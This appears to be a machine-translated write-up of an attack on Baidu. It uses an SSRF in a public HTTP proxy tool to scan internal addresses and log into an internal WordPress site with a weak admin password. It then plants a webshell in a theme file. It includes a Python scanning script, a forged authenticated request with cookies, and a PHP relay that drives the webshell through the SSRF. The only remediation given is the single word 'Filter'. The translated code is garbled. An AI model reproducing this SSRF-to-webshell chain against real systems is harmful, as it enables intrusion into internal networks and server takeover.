A Baidu WebShell from SSRF to Intranet
All stories start with a simple SSRF...
1. An SSRF
Http://apistore.baidu.com/astore/toolshttpproxy
Full functionality, including get post or something.
2. Intranet Detection
First, obtain some Intranet ip addresses from dns brute-force attacks, and then write a script for detection.
Test script
# Encoding = utf-8import httplibimport timeimport stringimport sysimport randomimport jsonimport tracebackimport urllib reload (sys) sys. setdefaultencoding ('utf8') headers = {'cooker': 'add your own ', 'content-type': 'application/x-www-form-urlencoded; charset = UTF-8 ', 'X-Requested-with': 'xmlhttprequest ', 'user-agent': 'mozilla/5.0 (Windows NT 6.1; WOW64; rv: 35.0) gecko/20100101 Firefox/35.0 '} for I in range (1,255): try: print I s = "172.22.1.% s "% (I) conn = httplib. HTTPConnection ('apistore .baidu.com ') conn. request (method = 'post', url = "/astore/toolshttpproxysend ", body = 'reqmethod = GET & reqUrl = http % 3A % 2F % 2F '+ s +' & token = token ', headers = headers) msg = conn. getresponse (). read () msg = json. loads (msg) if msg ["retMsg"] = "success": print s f = open('rrrr.txt ',' AB + ') f. write (s + '\ r \ n') f. write (urllib. unquote (msg ["retData"] ["responseHeader"]). replace ('<br/>', '\ r \ n') +' \ r \ n') f. write (urllib. unquote (msg ["retData"] ["responseBody"]). replace ('<br/>', '\ r \ n') +' \ r \ n \ r \ n') f. close () conn. close () failed T: print traceback. format_exc () pass
Test results:
One of the wordpress programs caught my attention.
Http: // 172.22.1.19 (cdm.baidu.com)
3. wordpress weak password detection
Weak passwords still result in many results
Wanglu admin
Take a test
Log on to POST first, and add it to the Request Header Based on the obtained cookie.
Http://apistore.baidu.com/astore/toolshttpproxysend?
ReqMethod = POST & reqUrl = http: // 172.22.1.19/wp-admin/& token = Response & reqHeaders [0] [key] = Cookie & reqHeaders [0] [value] = response = Response % 7C % 7C1425449844% 7C % 7C1425446244% 7C % 7C4bcc9f20e60d5905d3aaf9eda0c5fe28; bytes = 0; woocommerce_cart_hash = 0; wordpress_test_cookie = WP + Cookie + check; token = wanglu % 7C1425449844% signature; token = wanglu % signature;
The html after the background login is successfully queried.
The following is simple wordpress using shell and writing templates.
This process is troublesome, but it can be successful after a long time.
4. Connect to webshell
For ease of operation, a php forwarding proxy is written locally.
<?php $webshell="http://apistore.baidu.com/astore/toolshttpproxysend";$data['reqMethod']='POST';$data['reqUrl']='http://172.22.1.19/wp-content/themes/salient-new/404.php';$data['token']='ae6e554399dd045278f4128312f13853';$i = 0;foreach($_POST as $key => $value){ $data["reqBodyParams[$i][key]"]=$key; $data["reqBodyParams[$i][value]"]= urlencode( $value ); $i++;}$data = http_build_query($data); $opts = array ( 'http' => array ( 'method' => 'POST', 'header'=> "Content-type: application/x-www-form-urlencoded\r\nCookie: cookie\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n" . "Content-Length: " . strlen($data) . "\r\n", 'content' => $data) ); $context = stream_context_create($opts); $html = @file_get_contents($webshell, false, $context); $data = json_decode($html,true);echo urldecode($data["retData"]["responseBody"]);?>
The process is complete and the permission is obtained.
Solution:
Filter